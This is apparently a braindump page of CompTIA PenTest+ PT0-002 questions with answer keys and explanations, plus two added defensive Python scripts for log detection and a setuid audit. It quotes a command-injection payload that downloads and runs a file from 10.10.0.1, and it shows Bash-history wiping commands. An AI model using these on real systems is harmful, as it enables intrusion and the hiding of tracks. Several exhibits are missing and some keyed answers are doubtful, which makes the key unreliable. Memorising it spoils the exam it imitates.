[2024] Pass CompTIA PT0-002 Premium Files Test Engine pdf - Free Dumps Collection
NEW QUESTION # 214
After compromising a system, a penetration tester wants more information in order to decide what actions to take next. The tester runs the following commands:
Which of the following attacks is the penetration tester most likely trying to perform?
- A. Metadata service attack
- B. Resource exhaustion
- C. Container escape techniques
- D. Credential harvesting
Answer: A
Explanation:
The penetration tester is most likely trying to perform a metadata service attack, which is an attack that exploits a vulnerability in the metadata service of a cloud provider. The metadata service is a service that provides information about the cloud instance, such as its IP address, hostname, credentials, user data, or role permissions. The metadata service can be accessed from within the cloud instance by using a special IP address, such as 169.254.169.254 for AWS, Azure, and GCP. The commands that the penetration tester runs are curl commands, which are used to transfer data from or to a server. The curl commands are requesting data from the metadata service IP address with different paths, such as /latest/meta-data/iam/security-credentials/ and /latest/user-data/. These paths can reveal sensitive information about the cloud instance, such as its IAM role credentials or user data scripts. The penetration tester may use this information to escalate privileges, access other resources, or perform other actions on the cloud environment. The other options are not likely attacks that the penetration tester is trying to perform.
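From a detection standpoint, the curl requests described above leave a trace in egress or proxy logs. As an added example that is not part of the original question, the following Python scans log lines for requests to 169.254.169.254 and labels the two paths the explanation mentions; the log format and the sample lines are constructed for the example.

```python
"""Flag requests to the cloud instance metadata service in proxy/egress logs.

Added example, not from the original page. The log format below is a
constructed one ("<timestamp> <source-host> <method> <url> <status>"); adapt
LINE_RE to whatever your proxy or flow logs actually emit.
"""
import re
from dataclasses import dataclass

METADATA_IP = "169.254.169.254"

# Paths discussed in the explanation, mapped to a label for triage.
SENSITIVE_PREFIXES = {
    "/latest/meta-data/iam/security-credentials": "iam-credentials",
    "/latest/user-data": "user-data",
}

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<src>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+(?P<status>\d{3})$"
)
URL_RE = re.compile(r"^https?://(?P<host>[^/:?#]+)(?::\d+)?(?P<path>/[^?#]*)?")


@dataclass(frozen=True)
class Finding:
    ts: str
    src: str
    path: str
    category: str


def classify_path(path: str) -> str:
    """Label a metadata path; anything not in the table is still worth noting."""
    for prefix, label in SENSITIVE_PREFIXES.items():
        if path == prefix or path.startswith(prefix + "/"):
            return label
    return "metadata-other"


def scan_lines(lines):
    """Return one Finding per log line whose URL host is the metadata address."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # malformed or differently formatted line; ignore it
        u = URL_RE.match(m["url"])
        if not u or u["host"] != METADATA_IP:
            continue
        path = u["path"] or "/"
        findings.append(Finding(m["ts"], m["src"], path, classify_path(path)))
    return findings


# Constructed sample log lines for the example.
SAMPLE_LOG = [
    "2024-05-01T10:00:00Z web-01 GET https://updates.example.com/patch.tgz 200",
    "2024-05-01T10:00:05Z web-01 GET http://169.254.169.254/latest/meta-data/iam/security-credentials/ 200",
    "2024-05-01T10:00:06Z web-01 GET http://169.254.169.254/latest/meta-data/iam/security-credentials/app-role 200",
    "2024-05-01T10:00:09Z web-01 GET http://169.254.169.254/latest/user-data/ 200",
    "2024-05-01T10:00:12Z web-01 GET http://169.254.169.254/latest/meta-data/hostname 200",
    "this line is not in the expected format",
]

if __name__ == "__main__":
    for f in scan_lines(SAMPLE_LOG):
        print(f"{f.ts} {f.src} {f.category:16} {f.path}")
```

On a real instance the application itself may legitimately call the metadata service, so the useful signal is the credentials and user-data paths rather than any request at all.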
NEW QUESTION # 215
A penetration tester discovered a vulnerability that provides the ability to upload to a path via directory traversal. Some of the files that were discovered through this vulnerability are:
Which of the following is the BEST method to help an attacker gain internal access to the affected machine?
- A. Edit the discovered file with one line of code for remote callback
- B. Download the smb.conf file and look at configurations
- C. Download .pl files and look for usernames and passwords
- D. Edit the smb.conf file and upload it to the server
Answer: D
NEW QUESTION # 216
A red-team tester has been contracted to emulate the threat posed by a malicious insider on a company's network, with the constrained objective of gaining access to sensitive personnel files. During the assessment, the red-team tester identifies an artifact indicating possible prior compromise within the target environment.
Which of the following actions should the tester take?
- A. Perform forensic analysis to isolate the means of compromise and determine attribution.
- B. Halt the assessment and follow the reporting procedures as outlined in the contract.
- C. Incorporate the newly identified method of compromise into the red team's approach.
- D. Create a detailed document of findings before continuing with the assessment.
Answer: B
NEW QUESTION # 217
A penetration tester is performing an assessment of an application that allows users to upload documents to a cloud-based file server for easy access anywhere in the world. Which of the following would most likely allow a tester to access unintentionally exposed documents?
- A. Directory traversal attack
- B. Cross-site scripting attack
- C. Session attack
- D. Cross-site request forgery
Answer: A
Explanation:
A directory traversal attack, also known as a path traversal attack, is a method used to exploit insufficient validation or sanitization of user-supplied file names. The goal of this attack is to access directories and files that are stored outside the web root folder. By manipulating variables that reference files with "../" sequences and their variations, attackers can access restricted directories and execute commands outside of the web server's root directory.
In the context of an application that allows users to upload documents to a cloud-based file server, an attacker might exploit a directory traversal vulnerability to navigate to directories that contain sensitive documents. If the file upload functionality is not properly secured, an attacker could upload a file with a payload designed to perform directory traversal. This could allow access to confidential files that are otherwise protected by the application's access control mechanisms.
References:
* OWASP Directory Traversal Cheat Sheet: OWASP Directory Traversal
* Practical examples from HTB write-ups such as Forge and Anubis, which demonstrate similar enumeration techniques leading to sensitive file disclosures.
NEW QUESTION # 218
A penetration tester attempted a DNS poisoning attack. After the attempt, no traffic was seen from the target machine. Which of the following MOST likely caused the attack to fail?
- A. The DNS cache was not refreshed.
- B. The DNS information was incorrect.
- C. The client did not receive a trusted response.
- D. The injection was too slow.
Answer: A
Explanation:
A DNS poisoning attack is an attack that exploits a vulnerability in the DNS protocol or system to redirect traffic from legitimate websites to malicious ones. A DNS poisoning attack works by injecting false DNS records into a DNS server or resolver's cache, which is a temporary storage of DNS information. However, if the DNS cache was not refreshed, then the attack would fail, as the target machine would still use the old and valid DNS records from its cache. The other options are not likely causes of the attack failure.
NEW QUESTION # 219
Which of the following describe the GREATEST concerns about using third-party open-source libraries in application code? (Choose two.)
- A. The provenance of code is unknown
- B. The licensing of software is ambiguous
- C. The libraries' code bases could be read by anyone
- D. The libraries may be unsupported
- E. The libraries may be vulnerable
- F. The libraries may break the application
Answer: A,E
Explanation:
E: The libraries may be vulnerable to security bugs or exploits that can compromise the application or its data. Open-source libraries have often contained vulnerabilities that attackers exploited, such as Heartbleed, Shellshock, DROWN, or the npm left-pad incident. These issues can allow attackers to extract sensitive data, execute arbitrary commands, decrypt encrypted traffic, or break the functionality of the application. Therefore, using third-party open-source libraries in application code poses a significant security risk.
A: The provenance of the code is unknown, meaning that its origin and history are not verified or documented. Open-source libraries and the projects that consume them are developed and continuously evolve asynchronously, which makes it difficult to track the changes and updates to the code. Moreover, open-source libraries may depend on other libraries, which can introduce additional risks or vulnerabilities. Therefore, using third-party open-source libraries in application code poses a significant quality risk.
NEW QUESTION # 220
A penetration tester discovered that a client uses cloud mail as the company's email system. During the penetration test, the tester set up a fake cloud mail login page and sent all company employees an email that stated their inboxes were full and directed them to the fake login page to remedy the issue. Which of the following BEST describes this attack?
- A. Credential harvesting
- B. Privilege escalation
- C. Password spraying
- D. Domain record abuse
Answer: A
Explanation:
Credential harvesting is a type of attack that aims to collect usernames and passwords from unsuspecting users by tricking them into entering their credentials on a fake or spoofed website. Credential harvesting can be done by using phishing emails that lure users to click on malicious links or attachments that redirect them to the fake website. The fake website may look identical or similar to the legitimate one, but it will capture and store the user's credentials for later use by the attacker. In this case, the penetration tester set up a fake cloud mail login page and sent phishing emails to all company employees to harvest their credentials.
NEW QUESTION # 221
A penetration tester wrote the following script to be used in one engagement:
Which of the following actions will this script perform?
- A. Listen for a reverse shell.
- B. Attempt to flood open ports.
- C. Create an encrypted tunnel.
- D. Look for open ports.
Answer: D
Explanation:
The script will perform a port scan on the target IP address, looking for open ports on a list of common ports.
A port scan is a technique that probes a network or a system for open ports, which can reveal potential vulnerabilities or services running on the host.
NEW QUESTION # 222
The following output is from reconnaissance on a public-facing banking website:
Based on these results, which of the following attacks is MOST likely to succeed?
- A. An attack on a session ticket extension (Ticketbleed)
- B. A birthday attack on 64-bit ciphers (Sweet32)
- C. A Heartbleed attack
- D. An attack that breaks RC4 encryption
Answer: D
NEW QUESTION # 223
A penetration tester ran an Nmap scan on an Internet-facing network device with the -F option and found a few open ports. To further enumerate, the tester ran another scan using the following command:
nmap -O -A -sS -p- 100.100.100.50
Nmap returned that all 65,535 ports were filtered. Which of the following MOST likely occurred on the second scan?
- A. The edge network device was disconnected.
- B. The scan returned ICMP echo replies.
- C. The penetration tester used unsupported flags.
- D. A firewall or IPS blocked the scan.
Answer: D
NEW QUESTION # 224
A penetration tester performs several Nmap scans against the web application for a client.
INSTRUCTIONS
Click on the WAF and servers to review the results of the Nmap scans. Then click on each tab to select the appropriate vulnerability and remediation options.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Answer:
Explanation:
Most likely vulnerability: Perform a SSRF attack against App01.example.com from CDN.example.com.
The scenario suggests that the CDN network (with a WAF) can be used to perform a Server-Side Request Forgery (SSRF) attack. Since the penetration tester has the pentester workstation interacting through the CDN/WAF and the production network is behind it, the most plausible attack vector is to exploit SSRF to interact with the internal services like App01.example.com.
Two best remediation options:
* Restrict direct communications to App01.example.com to only approved components.
* Require an additional authentication header value between CDN.example.com and App01.example.com.
* Restrict direct communications to App01.example.com to only approved components: This limits the exposure of the application server by ensuring that only specified, trusted entities can communicate with it.
* Require an additional authentication header value between CDN.example.com and App01.example.com: Adding an authentication layer between the CDN and the app server helps ensure that requests are legitimate and originate from trusted sources, mitigating SSRF and other indirect attack vectors.
Nmap Scan Observations:
* CDN/WAF shows open ports for HTTP and HTTPS but filtered for MySQL, indicating it acts as a filtering layer.
* App Server has open ports for HTTP, HTTPS, and filtered for MySQL.
* DB Server has all ports filtered, typical for a database server that should not be directly accessible.
These findings align with the SSRF vulnerability and the appropriate remediation steps to enhance the security of internal communications.
NEW QUESTION # 225
Which of the following web-application security risks are part of the OWASP Top 10 v2017? (Choose two.)
- A. Injection flaws
- B. Zero-day attacks
- C. Ransomware attacks
- D. Race-condition attacks
- E. Cross-site scripting
- F. Buffer overflows
Answer: A,E
Explanation:
A01-Injection
A02-Broken Authentication
A03-Sensitive Data Exposure
A04-XXE
A05-Broken Access Control
A06-Security Misconfiguration
A07-XSS
A08-Insecure Deserialization
A09-Using Components with Known Vulnerabilities
A10-Insufficient Logging & Monitoring
Cross-site scripting (XSS) and injection flaws are two of the web-application security risks that are part of the OWASP Top 10 v2017 list. XSS is a type of attack that injects malicious scripts into web pages or applications that are viewed by other users, resulting in compromised sessions, stolen cookies, or redirected browsers. Injection flaws are a type of attack that exploits a vulnerability in an application's data input or output, such as SQL injection, command injection, or LDAP injection, resulting in unauthorized access, data loss, or remote code execution. The other options are not part of the OWASP Top 10 v2017 list.
NEW QUESTION # 226
Which of the following should a penetration tester do NEXT after identifying that an application being tested has already been compromised with malware?
- A. Analyze the malware to see what it does.
- B. Remove the malware immediately.
- C. Collect the proper evidence and then remove the malware.
- D. Stop the assessment and inform the emergency contact.
- E. Do a root-cause analysis to find out how the malware got in.
Answer: D
Explanation:
Stopping the assessment and informing the emergency contact is the best thing to do next after identifying that an application being tested has already been compromised with malware. This is because continuing the assessment might interfere with an ongoing investigation or compromise evidence collection. The emergency contact is the person designated by the client who should be notified in case of any critical issues or incidents during the penetration testing engagement.
NEW QUESTION # 227
A penetration tester runs the following command on a system:
find / -user root -perm -4000 -print 2>/dev/null
Which of the following is the tester trying to accomplish?
- A. Set the SGID on all files in the / directory
- B. Find the /root directory on the system
- C. Find files that were created during exploitation and move them to /dev/null
- D. Find files with the SUID bit set
Answer: D
Explanation:
The -perm -4000 test matches files whose setuid (SUID) bit is set, and -user root restricts the match to files owned by root; such binaries run with root privileges regardless of who executes them, which is why they are enumerated after gaining a foothold. The 2>/dev/null part is output redirection: it sends standard error (for example, permission-denied messages from directories the current user cannot read) to /dev/null, so those error messages do not clutter the terminal session.
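The same enumeration is useful to a defender as a periodic audit. As an added example that is not part of the original question, the Python below reproduces what the find command does (setuid bit, owner filter, errors skipped) and diffs the result against a known-good baseline so that a newly appeared setuid binary stands out; the fixture directory built in demo() is constructed for the example.

```python
"""Enumerate setuid files and diff them against a baseline.

Added example, not from the original page: the equivalent of
`find / -user root -perm -4000 -print 2>/dev/null`, written in Python so a
defender can compare the result with a known-good list. The fixture tree
created in demo() is constructed for the example.
"""
import os
import stat
import tempfile


def find_suid(root: str, owner_uid: int = 0):
    """Return regular files under root owned by owner_uid with the setuid bit set.

    owner_uid=0 mirrors `-user root`; unreadable directories and entries that
    vanish mid-walk are skipped silently, which is what `2>/dev/null` achieved.
    """
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root, onerror=lambda _e: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_uid == owner_uid and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def diff_against_baseline(found, baseline):
    """Split the current list into entries added since / missing from the baseline."""
    found_set, base_set = set(found), set(baseline)
    return {"new": sorted(found_set - base_set), "missing": sorted(base_set - found_set)}


def demo():
    """Build a constructed fixture tree, scan it, and return paths relative to it."""
    with tempfile.TemporaryDirectory() as tmp:
        os.makedirs(os.path.join(tmp, "bin"))
        fixtures = (("bin/passwd-like", 0o4755), ("bin/ls-like", 0o755), ("bin/sgid-only", 0o2755))
        for rel, mode in fixtures:
            p = os.path.join(tmp, rel)
            with open(p, "w") as fh:
                fh.write("#!/bin/sh\nexit 0\n")
            os.chmod(p, mode)
        # The files just created belong to the current user, so the audit uses
        # that uid instead of root (0); on a real host keep the default.
        found = [os.path.relpath(p, tmp) for p in find_suid(tmp, os.getuid())]
        baseline = ["bin/passwd-like", "bin/retired-tool"]  # constructed known-good list
        return {"suid": found, "diff": diff_against_baseline(found, baseline)}


if __name__ == "__main__":
    print(demo())
```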
NEW QUESTION # 228
A penetration tester is conducting an assessment on 192.168.1.112. Given the following output:
Which of the following is the penetration tester conducting?
- A. Credential stuffing
- B. Brute force
- C. Port scan
- D. DoS attack
Answer: B
Explanation:
The output shows multiple login attempts with different passwords for the same username "root" on the IP address 192.168.1.112. This is indicative of a brute force attack, where an attacker systematically tries various password combinations to gain unauthorized access. References: The Official CompTIA PenTest+ Study Guide (Exam PT0-002), Chapter 4: Conducting Passive Reconnaissance; The Official CompTIA PenTest+ Student Guide (Exam PT0-002), Lesson 4: Conducting Active Reconnaissance.
NEW QUESTION # 229
A potential reason for communicating with the client point of contact during a penetration test is to provide resolution if a testing component crashes a system or service and leaves them unavailable for both legitimate users and further testing. Which of the following best describes this concept?
- A. Remediation
- B. Retesting
- C. Collision detection
- D. De-escalation
Answer: A
Explanation:
Communicating with the client point of contact during a penetration test, especially when a testing component crashes a system or service, is crucial for remediation. Remediation involves the process of correcting or mitigating vulnerabilities that have been identified during the test. In the context of a system or service becoming unavailable, it's essential to promptly address and resolve the issue to restore availability and ensure the continuity of legitimate business operations. This communication ensures that the client is aware of the incident and can work together with the penetration tester to implement corrective actions, thereby minimizing the impact on the business and further testing activities.
NEW QUESTION # 230
A penetration tester gains access to a system and establishes persistence, and then runs the following commands:
cat /dev/null > temp
touch -r .bash_history temp
mv temp .bash_history
Which of the following actions is the tester MOST likely performing?
- A. Making a copy of the user's Bash history for further enumeration
- B. Making decoy files on the system to confuse incident responders
- C. Covering tracks by clearing the Bash history
- D. Redirecting Bash history to /dev/null
Answer: C
Explanation:
The commands are used to clear the Bash history file of the current user, which records the commands entered in the terminal. The first command writes the output of cat /dev/null (a special file that yields no data and discards anything written to it) into temp, which creates an empty file named temp. The second command changes the timestamp of temp to match that of .bash_history (the hidden file that stores the Bash history), so the modification time does not reveal when the file was replaced. The third command renames temp to .bash_history, which overwrites the original file with an empty one. This effectively erases any trace of the commands executed by the user.
NEW QUESTION # 231
Which of the following tools would be best suited to perform a cloud security assessment?
- A. Nessus
- B. OpenVAS
- C. ZAP
- D. Scout Suite
- E. Nmap
Answer: D
Explanation:
The tool that would be best suited to perform a cloud security assessment is Scout Suite, which is an open-source multi-cloud security auditing tool that can evaluate the security posture of cloud environments, such as AWS, Azure, GCP, or Alibaba Cloud. Scout Suite collects configuration data from cloud providers using their APIs and assesses it against security best practices or benchmarks, such as the CIS Foundations benchmarks. Scout Suite can generate reports that highlight security issues, risks, or gaps in the cloud environment, and provide recommendations for remediation or improvement. The other options are not tools that are specifically designed for cloud security assessment. OpenVAS is an open-source vulnerability scanner that can scan hosts and networks for vulnerabilities and generate reports with findings and recommendations. Nmap is an open-source network scanner and enumerator that can scan hosts and networks for ports, services, versions, OS, or other information. ZAP is an open-source web application scanner and proxy that can scan web applications for vulnerabilities and perform attacks such as SQL injection or XSS. Nessus is a commercial vulnerability scanner that can scan hosts and networks for vulnerabilities and generate reports with findings and recommendations.
NEW QUESTION # 232
A penetration tester runs the following command:
nmap -p- -A 10.0.1.10
Given the execution of this command, which of the following quantities of ports will Nmap scan?
- A. 1,024
- B. 10,000
- C. 1,000
- D. 65,535
Answer: D
Explanation:
The nmap command with the -p- flag scans all ports from 1 to 65535 on the target host. The -A flag enables OS detection, version detection, script scanning, and traceroute. Therefore, the command will scan 65,535 ports on the host 10.0.1.10 and perform additional analysis on the open ports. References:
* The Official CompTIA PenTest+ Study Guide (Exam PT0-002), Chapter 2: Conducting Passive Reconnaissance, pages 72-73.
* Nmap Cheat Sheet 2024: All the Commands & Flags - StationX
* Nmap Commands - 17 Basic Commands for Linux Network - phoenixNAP
NEW QUESTION # 233
A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized:
exploit = "POST "
exploit += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} -c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${IFS}./apache'%0A%27&loginUser=a&Pwd=a"
exploit += "HTTP/1.1"
Which of the following commands should the penetration tester run post-engagement?
- A. grep -v apache ~/.bash_history > ~/.bash_history
- B. chmod 600 /tmp/apache
- C. taskkill /IM "apache" /F
- D. rm -rf /tmp/apache
Answer: D
Explanation:
The exploit code is a command injection attack that uses a vulnerable CGI script to execute arbitrary commands on the target system. The commands are:
cd /tmp: change the current directory to /tmp
wget http://10.10.0.1/apache: download a file named apache from http://10.10.0.1
chmod 777 apache: change the permissions of the file to allow read, write, and execute for everyone
./apache: run the file as an executable
The file apache is most likely a malicious payload that gives the attacker remote access to the system or performs some other malicious action. Therefore, the penetration tester should run the command rm -rf /tmp/apache post-engagement to remove the file and its traces from the system. The other commands are not effective or relevant for this purpose.
NEW QUESTION # 234
A penetration tester ran the following commands on a Windows server:
Which of the following should the tester do AFTER delivering the final report?
- A. Delete the scheduled batch job.
- B. Downgrade the svsaccount permissions.
- C. Remove the tester-created credentials.
- D. Close the reverse shell connection.
Answer: C
NEW QUESTION # 235
A penetration tester who is conducting a web-application test discovers a clickjacking vulnerability associated with a login page to financial data. Which of the following should the tester do with this information to make this a successful exploit?
- A. Use browser autopwn.
- B. Use BeEF.
- C. Conduct a watering-hole attack.
- D. Perform XSS.
Answer: C
Explanation:
A clickjacking vulnerability allows an attacker to trick a user into clicking on a hidden element on a web page, such as a login button or a link. A watering-hole attack is a technique where the attacker compromises a website that is frequently visited by the target users, and injects malicious code or content into the website.
The attacker can then use the clickjacking vulnerability to redirect the users to a malicious website or perform unauthorized actions on their behalf.
D: Perform XSS. This is incorrect. XSS (cross-site scripting) is a vulnerability where an attacker injects malicious scripts into a web page that are executed by the browser of the victim. XSS can be used to steal cookies, session tokens, or other sensitive information, but it is not directly related to clickjacking.
B: Use BeEF. This is incorrect. BeEF (Browser Exploitation Framework) is a tool that allows an attacker to exploit various browser vulnerabilities and take control of the browser of the victim. BeEF can be used to launch clickjacking attacks, but it is not the only way to do so.
A: Use browser autopwn. This is incorrect. Browser autopwn is a feature of Metasploit that automatically exploits browser vulnerabilities and delivers a payload to the victim's system. Browser autopwn can be used to compromise the browser of the victim, but it is not directly related to clickjacking.
References:
* OWASP Foundation, "Clickjacking", https://owasp.org/www-community/attacks/Clickjacking
* PortSwigger, "What is clickjacking? Tutorial & Examples", https://portswigger.net/web-security/clickjacking
* Akto, "Clickjacking: Understanding vulnerability, attacks and prevention", https://www.akto.io/blog/clickjacking-understanding-vulnerability-attacks-and-prevention
NEW QUESTION # 236
Company.com has hired a penetration tester to conduct a phishing test. The tester wants to set up a fake log-in page and harvest credentials when target employees click on links in a phishing email. Which of the following commands would best help the tester determine which cloud email provider the log-in page needs to mimic?
- A. curl www.company.com
- B. dig company.com A
- C. dig company.com MX
- D. whois company.com
Answer: C
Explanation:
The dig command is a tool that can be used to query DNS servers and obtain information about domain names, such as IP addresses, mail servers, name servers, or other records. The MX option specifies that the query is for mail exchange records, which are records that indicate the mail servers responsible for accepting email messages for a domain. Therefore, the command dig company.com MX would best help the tester determine which cloud email provider the log-in page needs to mimic by showing the mail servers for company.com. For example, if the output shows something like company-com.mail.protection.outlook.com, then it means that company.com uses Microsoft Outlook as its cloud email provider. The other commands are not as useful for determining the cloud email provider. The whois command is a tool that can be used to query domain name registration information, such as the owner, registrar, or expiration date of a domain. The curl command is a tool that can be used to transfer data from or to a server using various protocols, such as HTTP, FTP, or SMTP. The dig command with the A option specifies that the query is for address records, which are records that map domain names to IP addresses.
NEW QUESTION # 237